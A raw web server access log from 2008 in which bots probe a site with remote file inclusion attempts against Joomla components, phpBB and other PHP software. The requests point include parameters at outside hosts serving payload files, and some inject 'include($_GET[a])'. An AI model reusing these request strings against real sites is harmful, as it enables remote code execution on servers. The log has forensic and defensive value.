70.86.234.234 - - [23/Jul/2008:06:18:28 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:18:35 -0700] "GET /logs/access_080629.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:18:35 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:18:35 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:19:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:19:13 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:19:13 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:20:21 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:20:23 -0700] "GET /logs/access_080611.log//index.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:20:40 -0700] "GET /logs/access_080625.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:20:40 -0700] "GET /logs/access_080625.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:20:51 -0700] "GET /logs/?sourcedir=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 200 1081 "-" "libwww-perl/5.811" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:20:51 -0700] "GET /?sourcedir=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:20:52 -0700] "GET /logs/access_080711.log/?sourcedir=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
216.246.53.83 - - [23/Jul/2008:06:20:52 -0700] "GET /logs/access_080703.log/?sourcedir=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:21:34 -0700] "GET /logs/access_080703.log//administrator/components/com_extcalendar/errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:21:35 -0700] "GET /logs/access_080703.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
66.96.80.31 - - [23/Jul/2008:06:23:57 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
66.96.80.31 - - [23/Jul/2008:06:23:57 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
66.96.80.31 - - [23/Jul/2008:06:23:57 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
66.96.80.31 - - [23/Jul/2008:06:24:30 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
66.96.80.31 - - [23/Jul/2008:06:24:30 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
66.96.80.31 - - [23/Jul/2008:06:24:31 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:25:01 -0700] "GET /logs/access_080711.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:25:01 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:25:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:25:27 -0700] "GET /logs/access_080624.log/phphtml.php?htmlclass_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:25:27 -0700] "GET /phphtml.php?htmlclass_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:25:27 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:25:47 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:25:47 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:25:47 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:26:07 -0700] "GET /logs/access_080703.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
64.119.177.12 - - [23/Jul/2008:06:26:24 -0700] "GET /logs/access_080711.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
64.119.177.12 - - [23/Jul/2008:06:26:24 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
64.119.177.12 - - [23/Jul/2008:06:26:24 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
62.213.79.186 - - [23/Jul/2008:06:27:06 -0700] "GET /logs/access_080611.log/errors.php?error=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.111.179.12 - - [23/Jul/2008:06:27:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.111.179.12 - - [23/Jul/2008:06:27:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
89.111.179.12 - - [23/Jul/2008:06:27:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:06:28:43 -0700] "GET /errors.php?error=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:06:28:44 -0700] "GET /logs/errors.php?error=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
87.253.162.5 - - [23/Jul/2008:06:29:16 -0700] "GET /errors.php?error=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
64.119.177.12 - - [23/Jul/2008:06:29:20 -0700] "GET /logs/access_080629.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sickskins.com"
193.189.74.71 - - [23/Jul/2008:06:32:03 -0700] "GET /?env[include_prefix]=http://ydivorce.com//admin/default_builders/PageCompose_home.sql??? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sickskins.com"
193.189.74.71 - - [23/Jul/2008:06:32:03 -0700] "GET /logs/?env[include_prefix]=http://ydivorce.com//admin/default_builders/PageCompose_home.sql??? HTTP/1.1" 200 1081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sickskins.com"
62.2.100.138 - - [23/Jul/2008:06:35:11 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
62.2.100.138 - - [23/Jul/2008:06:35:11 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
62.2.100.138 - - [23/Jul/2008:06:35:12 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
62.2.100.138 - - [23/Jul/2008:06:35:12 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
62.2.100.138 - - [23/Jul/2008:06:35:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
62.2.100.138 - - [23/Jul/2008:06:35:12 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:35:45 -0700] "GET /logs/access_080705.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:35:45 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:35:45 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://h1.ripway.com/anakbugis/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:35:50 -0700] "GET /logs/access_080705.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:35:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
216.18.5.126 - - [23/Jul/2008:06:35:51 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://classyclassified.com/images/save.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:06:36:23 -0700] "GET //index.php?page=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
62.212.130.170 - - [23/Jul/2008:06:36:24 -0700] "GET /logs//index.php?page=http://auxano.info/webcalendar/includes/js/yrec/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:36:32 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:36:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:36:33 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:37:23 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
70.86.234.234 - - [23/Jul/2008:06:37:30 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:37:34 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:37:34 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:37:34 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:38:58 -0700] "GET /logs/access_080711.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:38:58 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:38:58 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:39:00 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
217.198.149.178 - - [23/Jul/2008:06:39:00 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.pcshop.gr/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:39:13 -0700] "GET /logs/access_080705.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:39:40 -0700] "GET /logs/access_080604.log/joomla/index.php?option=com_restaurante&task=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:39:40 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:39:40 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
67.19.74.194 - - [23/Jul/2008:06:40:16 -0700] "GET /logs/access_080711.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
67.19.74.194 - - [23/Jul/2008:06:40:16 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
67.19.74.194 - - [23/Jul/2008:06:40:16 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
85.214.73.149 - - [23/Jul/2008:06:40:22 -0700] "GET /logs/access_080627.log/joomla/index.php?option=com_restaurante&task=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:40:24 -0700] "GET /logs/access_080711.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:27 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:27 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:27 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:35 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:35 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:36 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:37 -0700] "GET /logs/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:37 -0700] "GET /logs/access_080705.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:40:37 -0700] "GET /config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:41:22 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
67.19.74.194 - - [23/Jul/2008:06:41:29 -0700] "GET /logs/access_080629.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:41:31 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
72.52.214.245 - - [23/Jul/2008:06:41:40 -0700] "GET /logs/access.log/config.php?path_to_root=http://ahack.007gb.com/id2.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
87.253.162.5 - - [23/Jul/2008:06:42:17 -0700] "GET /logs/access.log/errors.php?error=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
87.253.162.5 - - [23/Jul/2008:06:42:17 -0700] "GET /logs/errors.php?error=http://www.brazebo.it/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:43:15 -0700] "GET /logs/access_080711.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:43:15 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:43:15 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
67.19.74.194 - - [23/Jul/2008:06:44:29 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://karenwheaton.com/calendar/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sickskins.com"
69.64.80.225 - - [23/Jul/2008:06:44:35 -0700] "GET /logs/access_080705.log%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D= HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:46:40 -0700] "GET /logs/access_080711.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:46:41 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
195.70.36.107 - - [23/Jul/2008:06:46:41 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sickskins.com"
207.7.108.165 - - [23/Jul/2008:06:47:01 -0700] "GET /index.php?sourcedir=http://cabinet-chapuis.info/graphisme/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sickskins.com"
